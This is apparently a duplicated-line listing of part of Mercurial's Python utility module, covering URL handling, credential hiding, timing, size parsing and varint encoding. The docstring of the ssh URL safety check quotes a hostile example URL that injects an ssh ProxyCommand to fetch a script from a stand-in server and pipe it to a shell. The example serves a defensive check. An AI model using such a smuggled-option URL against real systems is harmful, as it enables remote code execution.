3190 >>> bytes(url(b'file:///tmp/foo/bar'))
3205 >>> bytes(url(b'file:///tmp/foo/bar'))
3191 'file:///tmp/foo/bar'
3206 'file:///tmp/foo/bar'
3192 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3207 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3193 'file:///c:/tmp/foo/bar'
3208 'file:///c:/tmp/foo/bar'
3194 >>> print(url(br'bundle:foo\bar'))
3209 >>> print(url(br'bundle:foo\bar'))
3195 bundle:foo\bar
3210 bundle:foo\bar
3196 >>> print(url(br'file:///D:\data\hg'))
3211 >>> print(url(br'file:///D:\data\hg'))
3197 file:///D:\data\hg
3212 file:///D:\data\hg
3198 """
3213 """
3199 if self._localpath:
3214 if self._localpath:
3200 s = self.path
3215 s = self.path
3201 if self.scheme == b'bundle':
3216 if self.scheme == b'bundle':
3202 s = b'bundle:' + s
3217 s = b'bundle:' + s
3203 if self.fragment:
3218 if self.fragment:
3204 s += b'#' + self.fragment
3219 s += b'#' + self.fragment
3205 return s
3220 return s
3206
3221
3207 s = self.scheme + b':'
3222 s = self.scheme + b':'
3208 if self.user or self.passwd or self.host:
3223 if self.user or self.passwd or self.host:
3209 s += b'//'
3224 s += b'//'
3210 elif self.scheme and (
3225 elif self.scheme and (
3211 not self.path
3226 not self.path
3212 or self.path.startswith(b'/')
3227 or self.path.startswith(b'/')
3213 or hasdriveletter(self.path)
3228 or hasdriveletter(self.path)
3214 ):
3229 ):
3215 s += b'//'
3230 s += b'//'
3216 if hasdriveletter(self.path):
3231 if hasdriveletter(self.path):
3217 s += b'/'
3232 s += b'/'
3218 if self.user:
3233 if self.user:
3219 s += urlreq.quote(self.user, safe=self._safechars)
3234 s += urlreq.quote(self.user, safe=self._safechars)
3220 if self.passwd:
3235 if self.passwd:
3221 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3236 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3222 if self.user or self.passwd:
3237 if self.user or self.passwd:
3223 s += b'@'
3238 s += b'@'
3224 if self.host:
3239 if self.host:
3225 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3240 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3226 s += urlreq.quote(self.host)
3241 s += urlreq.quote(self.host)
3227 else:
3242 else:
3228 s += self.host
3243 s += self.host
3229 if self.port:
3244 if self.port:
3230 s += b':' + urlreq.quote(self.port)
3245 s += b':' + urlreq.quote(self.port)
3231 if self.host:
3246 if self.host:
3232 s += b'/'
3247 s += b'/'
3233 if self.path:
3248 if self.path:
3234 # TODO: similar to the query string, we should not unescape the
3249 # TODO: similar to the query string, we should not unescape the
3235 # path when we store it, the path might contain '%2f' = '/',
3250 # path when we store it, the path might contain '%2f' = '/',
3236 # which we should *not* escape.
3251 # which we should *not* escape.
3237 s += urlreq.quote(self.path, safe=self._safepchars)
3252 s += urlreq.quote(self.path, safe=self._safepchars)
3238 if self.query:
3253 if self.query:
3239 # we store the query in escaped form.
3254 # we store the query in escaped form.
3240 s += b'?' + self.query
3255 s += b'?' + self.query
3241 if self.fragment is not None:
3256 if self.fragment is not None:
3242 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3257 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3243 return s
3258 return s
3244
3259
3245 __str__ = encoding.strmethod(__bytes__)
3260 __str__ = encoding.strmethod(__bytes__)
3246
3261
3247 def authinfo(self):
3262 def authinfo(self):
3248 user, passwd = self.user, self.passwd
3263 user, passwd = self.user, self.passwd
3249 try:
3264 try:
3250 self.user, self.passwd = None, None
3265 self.user, self.passwd = None, None
3251 s = bytes(self)
3266 s = bytes(self)
3252 finally:
3267 finally:
3253 self.user, self.passwd = user, passwd
3268 self.user, self.passwd = user, passwd
3254 if not self.user:
3269 if not self.user:
3255 return (s, None)
3270 return (s, None)
3256 # authinfo[1] is passed to urllib2 password manager, and its
3271 # authinfo[1] is passed to urllib2 password manager, and its
3257 # URIs must not contain credentials. The host is passed in the
3272 # URIs must not contain credentials. The host is passed in the
3258 # URIs list because Python < 2.4.3 uses only that to search for
3273 # URIs list because Python < 2.4.3 uses only that to search for
3259 # a password.
3274 # a password.
3260 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3275 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3261
3276
3262 def isabs(self):
3277 def isabs(self):
3263 if self.scheme and self.scheme != b'file':
3278 if self.scheme and self.scheme != b'file':
3264 return True # remote URL
3279 return True # remote URL
3265 if hasdriveletter(self.path):
3280 if hasdriveletter(self.path):
3266 return True # absolute for our purposes - can't be joined()
3281 return True # absolute for our purposes - can't be joined()
3267 if self.path.startswith(br'\\'):
3282 if self.path.startswith(br'\\'):
3268 return True # Windows UNC path
3283 return True # Windows UNC path
3269 if self.path.startswith(b'/'):
3284 if self.path.startswith(b'/'):
3270 return True # POSIX-style
3285 return True # POSIX-style
3271 return False
3286 return False
3272
3287
3273 def localpath(self):
3288 def localpath(self):
3274 # type: () -> bytes
3289 # type: () -> bytes
3275 if self.scheme == b'file' or self.scheme == b'bundle':
3290 if self.scheme == b'file' or self.scheme == b'bundle':
3276 path = self.path or b'/'
3291 path = self.path or b'/'
3277 # For Windows, we need to promote hosts containing drive
3292 # For Windows, we need to promote hosts containing drive
3278 # letters to paths with drive letters.
3293 # letters to paths with drive letters.
3279 if hasdriveletter(self._hostport):
3294 if hasdriveletter(self._hostport):
3280 path = self._hostport + b'/' + self.path
3295 path = self._hostport + b'/' + self.path
3281 elif (
3296 elif (
3282 self.host is not None and self.path and not hasdriveletter(path)
3297 self.host is not None and self.path and not hasdriveletter(path)
3283 ):
3298 ):
3284 path = b'/' + path
3299 path = b'/' + path
3285 return path
3300 return path
3286 return self._origpath
3301 return self._origpath
3287
3302
3288 def islocal(self):
3303 def islocal(self):
3289 '''whether localpath will return something that posixfile can open'''
3304 '''whether localpath will return something that posixfile can open'''
3290 return (
3305 return (
3291 not self.scheme
3306 not self.scheme
3292 or self.scheme == b'file'
3307 or self.scheme == b'file'
3293 or self.scheme == b'bundle'
3308 or self.scheme == b'bundle'
3294 )
3309 )
3295
3310
3296
3311
3297 def hasscheme(path):
3312 def hasscheme(path):
3298 # type: (bytes) -> bool
3313 # type: (bytes) -> bool
3299 return bool(url(path).scheme) # cast to help pytype
3314 return bool(url(path).scheme) # cast to help pytype
3300
3315
3301
3316
3302 def hasdriveletter(path):
3317 def hasdriveletter(path):
3303 # type: (bytes) -> bool
3318 # type: (bytes) -> bool
3304 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3319 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3305
3320
3306
3321
3307 def urllocalpath(path):
3322 def urllocalpath(path):
3308 # type: (bytes) -> bytes
3323 # type: (bytes) -> bytes
3309 return url(path, parsequery=False, parsefragment=False).localpath()
3324 return url(path, parsequery=False, parsefragment=False).localpath()
3310
3325
3311
3326
3312 def checksafessh(path):
3327 def checksafessh(path):
3313 # type: (bytes) -> None
3328 # type: (bytes) -> None
3314 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3329 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3315
3330
3316 This is a sanity check for ssh urls. ssh will parse the first item as
3331 This is a sanity check for ssh urls. ssh will parse the first item as
3317 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3332 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3318 Let's prevent these potentially exploited urls entirely and warn the
3333 Let's prevent these potentially exploited urls entirely and warn the
3319 user.
3334 user.
3320
3335
3321 Raises an error.Abort when the url is unsafe.
3336 Raises an error.Abort when the url is unsafe.
3322 """
3337 """
3323 path = urlreq.unquote(path)
3338 path = urlreq.unquote(path)
3324 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3339 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3325 raise error.Abort(
3340 raise error.Abort(
3326 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3341 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3327 )
3342 )
3328
3343
3329
3344
3330 def hidepassword(u):
3345 def hidepassword(u):
3331 # type: (bytes) -> bytes
3346 # type: (bytes) -> bytes
3332 '''hide user credential in a url string'''
3347 '''hide user credential in a url string'''
3333 u = url(u)
3348 u = url(u)
3334 if u.passwd:
3349 if u.passwd:
3335 u.passwd = b'***'
3350 u.passwd = b'***'
3336 return bytes(u)
3351 return bytes(u)
3337
3352
3338
3353
3339 def removeauth(u):
3354 def removeauth(u):
3340 # type: (bytes) -> bytes
3355 # type: (bytes) -> bytes
3341 '''remove all authentication information from a url string'''
3356 '''remove all authentication information from a url string'''
3342 u = url(u)
3357 u = url(u)
3343 u.user = u.passwd = None
3358 u.user = u.passwd = None
3344 return bytes(u)
3359 return bytes(u)
3345
3360
3346
3361
3347 timecount = unitcountfn(
3362 timecount = unitcountfn(
3348 (1, 1e3, _(b'%.0f s')),
3363 (1, 1e3, _(b'%.0f s')),
3349 (100, 1, _(b'%.1f s')),
3364 (100, 1, _(b'%.1f s')),
3350 (10, 1, _(b'%.2f s')),
3365 (10, 1, _(b'%.2f s')),
3351 (1, 1, _(b'%.3f s')),
3366 (1, 1, _(b'%.3f s')),
3352 (100, 0.001, _(b'%.1f ms')),
3367 (100, 0.001, _(b'%.1f ms')),
3353 (10, 0.001, _(b'%.2f ms')),
3368 (10, 0.001, _(b'%.2f ms')),
3354 (1, 0.001, _(b'%.3f ms')),
3369 (1, 0.001, _(b'%.3f ms')),
3355 (100, 0.000001, _(b'%.1f us')),
3370 (100, 0.000001, _(b'%.1f us')),
3356 (10, 0.000001, _(b'%.2f us')),
3371 (10, 0.000001, _(b'%.2f us')),
3357 (1, 0.000001, _(b'%.3f us')),
3372 (1, 0.000001, _(b'%.3f us')),
3358 (100, 0.000000001, _(b'%.1f ns')),
3373 (100, 0.000000001, _(b'%.1f ns')),
3359 (10, 0.000000001, _(b'%.2f ns')),
3374 (10, 0.000000001, _(b'%.2f ns')),
3360 (1, 0.000000001, _(b'%.3f ns')),
3375 (1, 0.000000001, _(b'%.3f ns')),
3361 )
3376 )
3362
3377
3363
3378
3364 @attr.s
3379 @attr.s
3365 class timedcmstats(object):
3380 class timedcmstats(object):
3366 """Stats information produced by the timedcm context manager on entering."""
3381 """Stats information produced by the timedcm context manager on entering."""
3367
3382
3368 # the starting value of the timer as a float (meaning and resulution is
3383 # the starting value of the timer as a float (meaning and resulution is
3369 # platform dependent, see util.timer)
3384 # platform dependent, see util.timer)
3370 start = attr.ib(default=attr.Factory(lambda: timer()))
3385 start = attr.ib(default=attr.Factory(lambda: timer()))
3371 # the number of seconds as a floating point value; starts at 0, updated when
3386 # the number of seconds as a floating point value; starts at 0, updated when
3372 # the context is exited.
3387 # the context is exited.
3373 elapsed = attr.ib(default=0)
3388 elapsed = attr.ib(default=0)
3374 # the number of nested timedcm context managers.
3389 # the number of nested timedcm context managers.
3375 level = attr.ib(default=1)
3390 level = attr.ib(default=1)
3376
3391
3377 def __bytes__(self):
3392 def __bytes__(self):
3378 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3393 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3379
3394
3380 __str__ = encoding.strmethod(__bytes__)
3395 __str__ = encoding.strmethod(__bytes__)
3381
3396
3382
3397
3383 @contextlib.contextmanager
3398 @contextlib.contextmanager
3384 def timedcm(whencefmt, *whenceargs):
3399 def timedcm(whencefmt, *whenceargs):
3385 """A context manager that produces timing information for a given context.
3400 """A context manager that produces timing information for a given context.
3386
3401
3387 On entering a timedcmstats instance is produced.
3402 On entering a timedcmstats instance is produced.
3388
3403
3389 This context manager is reentrant.
3404 This context manager is reentrant.
3390
3405
3391 """
3406 """
3392 # track nested context managers
3407 # track nested context managers
3393 timedcm._nested += 1
3408 timedcm._nested += 1
3394 timing_stats = timedcmstats(level=timedcm._nested)
3409 timing_stats = timedcmstats(level=timedcm._nested)
3395 try:
3410 try:
3396 with tracing.log(whencefmt, *whenceargs):
3411 with tracing.log(whencefmt, *whenceargs):
3397 yield timing_stats
3412 yield timing_stats
3398 finally:
3413 finally:
3399 timing_stats.elapsed = timer() - timing_stats.start
3414 timing_stats.elapsed = timer() - timing_stats.start
3400 timedcm._nested -= 1
3415 timedcm._nested -= 1
3401
3416
3402
3417
3403 timedcm._nested = 0
3418 timedcm._nested = 0
3404
3419
3405
3420
3406 def timed(func):
3421 def timed(func):
3407 """Report the execution time of a function call to stderr.
3422 """Report the execution time of a function call to stderr.
3408
3423
3409 During development, use as a decorator when you need to measure
3424 During development, use as a decorator when you need to measure
3410 the cost of a function, e.g. as follows:
3425 the cost of a function, e.g. as follows:
3411
3426
3412 @util.timed
3427 @util.timed
3413 def foo(a, b, c):
3428 def foo(a, b, c):
3414 pass
3429 pass
3415 """
3430 """
3416
3431
3417 def wrapper(*args, **kwargs):
3432 def wrapper(*args, **kwargs):
3418 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3433 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3419 result = func(*args, **kwargs)
3434 result = func(*args, **kwargs)
3420 stderr = procutil.stderr
3435 stderr = procutil.stderr
3421 stderr.write(
3436 stderr.write(
3422 b'%s%s: %s\n'
3437 b'%s%s: %s\n'
3423 % (
3438 % (
3424 b' ' * time_stats.level * 2,
3439 b' ' * time_stats.level * 2,
3425 pycompat.bytestr(func.__name__),
3440 pycompat.bytestr(func.__name__),
3426 time_stats,
3441 time_stats,
3427 )
3442 )
3428 )
3443 )
3429 return result
3444 return result
3430
3445
3431 return wrapper
3446 return wrapper
3432
3447
3433
3448
3434 _sizeunits = (
3449 _sizeunits = (
3435 (b'm', 2 ** 20),
3450 (b'm', 2 ** 20),
3436 (b'k', 2 ** 10),
3451 (b'k', 2 ** 10),
3437 (b'g', 2 ** 30),
3452 (b'g', 2 ** 30),
3438 (b'kb', 2 ** 10),
3453 (b'kb', 2 ** 10),
3439 (b'mb', 2 ** 20),
3454 (b'mb', 2 ** 20),
3440 (b'gb', 2 ** 30),
3455 (b'gb', 2 ** 30),
3441 (b'b', 1),
3456 (b'b', 1),
3442 )
3457 )
3443
3458
3444
3459
3445 def sizetoint(s):
3460 def sizetoint(s):
3446 # type: (bytes) -> int
3461 # type: (bytes) -> int
3447 """Convert a space specifier to a byte count.
3462 """Convert a space specifier to a byte count.
3448
3463
3449 >>> sizetoint(b'30')
3464 >>> sizetoint(b'30')
3450 30
3465 30
3451 >>> sizetoint(b'2.2kb')
3466 >>> sizetoint(b'2.2kb')
3452 2252
3467 2252
3453 >>> sizetoint(b'6M')
3468 >>> sizetoint(b'6M')
3454 6291456
3469 6291456
3455 """
3470 """
3456 t = s.strip().lower()
3471 t = s.strip().lower()
3457 try:
3472 try:
3458 for k, u in _sizeunits:
3473 for k, u in _sizeunits:
3459 if t.endswith(k):
3474 if t.endswith(k):
3460 return int(float(t[: -len(k)]) * u)
3475 return int(float(t[: -len(k)]) * u)
3461 return int(t)
3476 return int(t)
3462 except ValueError:
3477 except ValueError:
3463 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3478 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3464
3479
3465
3480
3466 class hooks(object):
3481 class hooks(object):
3467 """A collection of hook functions that can be used to extend a
3482 """A collection of hook functions that can be used to extend a
3468 function's behavior. Hooks are called in lexicographic order,
3483 function's behavior. Hooks are called in lexicographic order,
3469 based on the names of their sources."""
3484 based on the names of their sources."""
3470
3485
3471 def __init__(self):
3486 def __init__(self):
3472 self._hooks = []
3487 self._hooks = []
3473
3488
3474 def add(self, source, hook):
3489 def add(self, source, hook):
3475 self._hooks.append((source, hook))
3490 self._hooks.append((source, hook))
3476
3491
3477 def __call__(self, *args):
3492 def __call__(self, *args):
3478 self._hooks.sort(key=lambda x: x[0])
3493 self._hooks.sort(key=lambda x: x[0])
3479 results = []
3494 results = []
3480 for source, hook in self._hooks:
3495 for source, hook in self._hooks:
3481 results.append(hook(*args))
3496 results.append(hook(*args))
3482 return results
3497 return results
3483
3498
3484
3499
3485 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3500 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3486 """Yields lines for a nicely formatted stacktrace.
3501 """Yields lines for a nicely formatted stacktrace.
3487 Skips the 'skip' last entries, then return the last 'depth' entries.
3502 Skips the 'skip' last entries, then return the last 'depth' entries.
3488 Each file+linenumber is formatted according to fileline.
3503 Each file+linenumber is formatted according to fileline.
3489 Each line is formatted according to line.
3504 Each line is formatted according to line.
3490 If line is None, it yields:
3505 If line is None, it yields:
3491 length of longest filepath+line number,
3506 length of longest filepath+line number,
3492 filepath+linenumber,
3507 filepath+linenumber,
3493 function
3508 function
3494
3509
3495 Not be used in production code but very convenient while developing.
3510 Not be used in production code but very convenient while developing.
3496 """
3511 """
3497 entries = [
3512 entries = [
3498 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3513 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3499 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3514 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3500 ][-depth:]
3515 ][-depth:]
3501 if entries:
3516 if entries:
3502 fnmax = max(len(entry[0]) for entry in entries)
3517 fnmax = max(len(entry[0]) for entry in entries)
3503 for fnln, func in entries:
3518 for fnln, func in entries:
3504 if line is None:
3519 if line is None:
3505 yield (fnmax, fnln, func)
3520 yield (fnmax, fnln, func)
3506 else:
3521 else:
3507 yield line % (fnmax, fnln, func)
3522 yield line % (fnmax, fnln, func)
3508
3523
3509
3524
3510 def debugstacktrace(
3525 def debugstacktrace(
3511 msg=b'stacktrace',
3526 msg=b'stacktrace',
3512 skip=0,
3527 skip=0,
3513 f=procutil.stderr,
3528 f=procutil.stderr,
3514 otherf=procutil.stdout,
3529 otherf=procutil.stdout,
3515 depth=0,
3530 depth=0,
3516 prefix=b'',
3531 prefix=b'',
3517 ):
3532 ):
3518 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3533 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3519 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3534 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3520 By default it will flush stdout first.
3535 By default it will flush stdout first.
3521 It can be used everywhere and intentionally does not require an ui object.
3536 It can be used everywhere and intentionally does not require an ui object.
3522 Not be used in production code but very convenient while developing.
3537 Not be used in production code but very convenient while developing.
3523 """
3538 """
3524 if otherf:
3539 if otherf:
3525 otherf.flush()
3540 otherf.flush()
3526 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3541 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3527 for line in getstackframes(skip + 1, depth=depth):
3542 for line in getstackframes(skip + 1, depth=depth):
3528 f.write(prefix + line)
3543 f.write(prefix + line)
3529 f.flush()
3544 f.flush()
3530
3545
3531
3546
3532 # convenient shortcut
3547 # convenient shortcut
3533 dst = debugstacktrace
3548 dst = debugstacktrace
3534
3549
3535
3550
3536 def safename(f, tag, ctx, others=None):
3551 def safename(f, tag, ctx, others=None):
3537 """
3552 """
3538 Generate a name that it is safe to rename f to in the given context.
3553 Generate a name that it is safe to rename f to in the given context.
3539
3554
3540 f: filename to rename
3555 f: filename to rename
3541 tag: a string tag that will be included in the new name
3556 tag: a string tag that will be included in the new name
3542 ctx: a context, in which the new name must not exist
3557 ctx: a context, in which the new name must not exist
3543 others: a set of other filenames that the new name must not be in
3558 others: a set of other filenames that the new name must not be in
3544
3559
3545 Returns a file name of the form oldname~tag[~number] which does not exist
3560 Returns a file name of the form oldname~tag[~number] which does not exist
3546 in the provided context and is not in the set of other names.
3561 in the provided context and is not in the set of other names.
3547 """
3562 """
3548 if others is None:
3563 if others is None:
3549 others = set()
3564 others = set()
3550
3565
3551 fn = b'%s~%s' % (f, tag)
3566 fn = b'%s~%s' % (f, tag)
3552 if fn not in ctx and fn not in others:
3567 if fn not in ctx and fn not in others:
3553 return fn
3568 return fn
3554 for n in itertools.count(1):
3569 for n in itertools.count(1):
3555 fn = b'%s~%s~%s' % (f, tag, n)
3570 fn = b'%s~%s~%s' % (f, tag, n)
3556 if fn not in ctx and fn not in others:
3571 if fn not in ctx and fn not in others:
3557 return fn
3572 return fn
3558
3573
3559
3574
3560 def readexactly(stream, n):
3575 def readexactly(stream, n):
3561 '''read n bytes from stream.read and abort if less was available'''
3576 '''read n bytes from stream.read and abort if less was available'''
3562 s = stream.read(n)
3577 s = stream.read(n)
3563 if len(s) < n:
3578 if len(s) < n:
3564 raise error.Abort(
3579 raise error.Abort(
3565 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3580 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3566 % (len(s), n)
3581 % (len(s), n)
3567 )
3582 )
3568 return s
3583 return s
3569
3584
3570
3585
3571 def uvarintencode(value):
3586 def uvarintencode(value):
3572 """Encode an unsigned integer value to a varint.
3587 """Encode an unsigned integer value to a varint.
3573
3588
3574 A varint is a variable length integer of 1 or more bytes. Each byte
3589 A varint is a variable length integer of 1 or more bytes. Each byte
3575 except the last has the most significant bit set. The lower 7 bits of
3590 except the last has the most significant bit set. The lower 7 bits of
3576 each byte store the 2's complement representation, least significant group
3591 each byte store the 2's complement representation, least significant group
3577 first.
3592 first.
3578
3593
3579 >>> uvarintencode(0)
3594 >>> uvarintencode(0)
3580 '\\x00'
3595 '\\x00'
3581 >>> uvarintencode(1)
3596 >>> uvarintencode(1)
3582 '\\x01'
3597 '\\x01'
3583 >>> uvarintencode(127)
3598 >>> uvarintencode(127)
3584 '\\x7f'
3599 '\\x7f'
3585 >>> uvarintencode(1337)
3600 >>> uvarintencode(1337)
3586 '\\xb9\\n'
3601 '\\xb9\\n'
3587 >>> uvarintencode(65536)
3602 >>> uvarintencode(65536)
3588 '\\x80\\x80\\x04'
3603 '\\x80\\x80\\x04'
3589 >>> uvarintencode(-1)
3604 >>> uvarintencode(-1)
3590 Traceback (most recent call last):
3605 Traceback (most recent call last):
3591 ...
3606 ...
3592 ProgrammingError: negative value for uvarint: -1
3607 ProgrammingError: negative value for uvarint: -1
3593 """
3608 """
3594 if value < 0:
3609 if value < 0:
3595 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3610 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3596 bits = value & 0x7F
3611 bits = value & 0x7F
3597 value >>= 7
3612 value >>= 7
3598 bytes = []
3613 bytes = []
3599 while value:
3614 while value:
3600 bytes.append(pycompat.bytechr(0x80 | bits))
3615 bytes.append(pycompat.bytechr(0x80 | bits))
3601 bits = value & 0x7F
3616 bits = value & 0x7F
3602 value >>= 7
3617 value >>= 7
3603 bytes.append(pycompat.bytechr(bits))
3618 bytes.append(pycompat.bytechr(bits))
3604
3619
3605 return b''.join(bytes)
3620 return b''.join(bytes)
3606
3621
3607
3622
3608 def uvarintdecodestream(fh):
3623 def uvarintdecodestream(fh):
3609 """Decode an unsigned variable length integer from a stream.
3624 """Decode an unsigned variable length integer from a stream.
3610
3625
3611 The passed argument is anything that has a ``.read(N)`` method.
3626 The passed argument is anything that has a ``.read(N)`` method.
3612
3627
3613 >>> try:
3628 >>> try:
3614 ... from StringIO import StringIO as BytesIO
3629 ... from StringIO import StringIO as BytesIO
3615 ... except ImportError:
3630 ... except ImportError:
3616 ... from io import BytesIO
3631 ... from io import BytesIO
3617 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3632 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3618 0
3633 0
3619 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3634 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3620 1
3635 1
3621 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3636 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3622 127
3637 127
3623 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3638 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3624 1337
3639 1337
3625 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3640 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3626 65536
3641 65536
3627 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3642 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3628 Traceback (most recent call last):
3643 Traceback (most recent call last):
3629 ...
3644 ...
3630 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3645 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3631 """
3646 """
3632 result = 0
3647 result = 0
3633 shift = 0
3648 shift = 0
3634 while True:
3649 while True:
3635 byte = ord(readexactly(fh, 1))
3650 byte = ord(readexactly(fh, 1))
3636 result |= (byte & 0x7F) << shift
3651 result |= (byte & 0x7F) << shift
3637 if not (byte & 0x80):
3652 if not (byte & 0x80):
3638 return result
3653 return result
3639 shift += 7
3654 shift += 7
3640
3655
3641
3656
3642 # Passing the '' locale means that the locale should be set according to the
3657 # Passing the '' locale means that the locale should be set according to the
3643 # user settings (environment variables).
3658 # user settings (environment variables).
3644 # Python sometimes avoids setting the global locale settings. When interfacing
3659 # Python sometimes avoids setting the global locale settings. When interfacing
3645 # with C code (e.g. the curses module or the Subversion bindings), the global
3660 # with C code (e.g. the curses module or the Subversion bindings), the global
3646 # locale settings must be initialized correctly. Python 2 does not initialize
3661 # locale settings must be initialized correctly. Python 2 does not initialize
3647 # the global locale settings on interpreter startup. Python 3 sometimes
3662 # the global locale settings on interpreter startup. Python 3 sometimes
3648 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3663 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3649 # explicitly initialize it to get consistent behavior if it's not already
3664 # explicitly initialize it to get consistent behavior if it's not already
3650 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3665 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3651 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3666 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3652 # if we can remove this code.
3667 # if we can remove this code.
3653 @contextlib.contextmanager
3668 @contextlib.contextmanager
3654 def with_lc_ctype():
3669 def with_lc_ctype():
3655 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3670 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3656 if oldloc == 'C':
3671 if oldloc == 'C':
3657 try:
3672 try:
3658 try:
3673 try:
3659 locale.setlocale(locale.LC_CTYPE, '')
3674 locale.setlocale(locale.LC_CTYPE, '')
3660 except locale.Error:
3675 except locale.Error:
3661 # The likely case is that the locale from the environment
3676 # The likely case is that the locale from the environment
3662 # variables is unknown.
3677 # variables is unknown.
3663 pass
3678 pass
3664 yield
3679 yield
3665 finally:
3680 finally:
3666 locale.setlocale(locale.LC_CTYPE, oldloc)
3681 locale.setlocale(locale.LC_CTYPE, oldloc)
3667 else:
3682 else:
3668 yield
3683 yield
3669
3684
3670
3685
3671 def _estimatememory():
3686 def _estimatememory():
3672 # type: () -> Optional[int]
3687 # type: () -> Optional[int]
3673 """Provide an estimate for the available system memory in Bytes.
3688 """Provide an estimate for the available system memory in Bytes.
3674
3689
3675 If no estimate can be provided on the platform, returns None.
3690 If no estimate can be provided on the platform, returns None.
3676 """
3691 """
3677 if pycompat.sysplatform.startswith(b'win'):
3692 if pycompat.sysplatform.startswith(b'win'):
3678 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3693 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3679 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3694 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3680 from ctypes.wintypes import ( # pytype: disable=import-error
3695 from ctypes.wintypes import ( # pytype: disable=import-error
3681 Structure,
3696 Structure,
3682 byref,
3697 byref,
3683 sizeof,
3698 sizeof,
3684 windll,
3699 windll,
3685 )
3700 )
3686
3701
3687 class MEMORYSTATUSEX(Structure):
3702 class MEMORYSTATUSEX(Structure):
3688 _fields_ = [
3703 _fields_ = [
3689 ('dwLength', DWORD),
3704 ('dwLength', DWORD),
3690 ('dwMemoryLoad', DWORD),
3705 ('dwMemoryLoad', DWORD),
3691 ('ullTotalPhys', DWORDLONG),
3706 ('ullTotalPhys', DWORDLONG),
3692 ('ullAvailPhys', DWORDLONG),
3707 ('ullAvailPhys', DWORDLONG),
3693 ('ullTotalPageFile', DWORDLONG),
3708 ('ullTotalPageFile', DWORDLONG),
3694 ('ullAvailPageFile', DWORDLONG),
3709 ('ullAvailPageFile', DWORDLONG),
3695 ('ullTotalVirtual', DWORDLONG),
3710 ('ullTotalVirtual', DWORDLONG),
3696 ('ullAvailVirtual', DWORDLONG),
3711 ('ullAvailVirtual', DWORDLONG),
3697 ('ullExtendedVirtual', DWORDLONG),
3712 ('ullExtendedVirtual', DWORDLONG),
3698 ]
3713 ]
3699
3714
3700 x = MEMORYSTATUSEX()
3715 x = MEMORYSTATUSEX()
3701 x.dwLength = sizeof(x)
3716 x.dwLength = sizeof(x)
3702 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3717 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3703 return x.ullAvailPhys
3718 return x.ullAvailPhys
3704
3719
3705 # On newer Unix-like systems and Mac OSX, the sysconf interface
3720 # On newer Unix-like systems and Mac OSX, the sysconf interface
3706 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3721 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3707 # seems to be implemented on most systems.
